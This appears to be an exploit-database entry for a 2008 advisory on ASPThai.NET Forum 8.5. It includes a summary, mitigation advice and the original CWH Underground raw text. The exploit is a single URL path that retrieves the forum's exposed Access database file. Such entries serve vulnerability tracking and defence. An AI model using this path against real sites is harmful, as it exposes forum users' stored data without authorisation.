header-logo
Suggest Exploit
vendor:
ASPThai.NET Forum
by:
CWH Underground
7.5
CVSS
HIGH
Remote Database Disclosure
200
CWE
Product Name: ASPThai.NET Forum
Affected Version From: 8.5
Affected Version To: 8.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

ASPThai.NET Forum 8.5 Remote Database Disclosure Vulnerability

The vulnerability allows an attacker to disclose the database of the ASPThai.NET Forum 8.5 application. By accessing the URL 'http://[Target]/database/aspthaiForum.mdb', the attacker can retrieve the database file.

Mitigation:

Apply the latest patch or update from the vendor to fix the vulnerability. Ensure that the database file is not accessible from the web server.
Source

Exploit-DB raw data:

==================================================================
  ASPThai.NET Forum 8.5 Remote Database Disclosure Vulnerability
==================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 29 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : ASPThai.NET Forum
 VERSION     : 8.5
 VENDOR	     : www.aspthai.net
#####################################################

http://[Target]/database/aspthaiForum.mdb

# milw0rm.com [2008-11-29]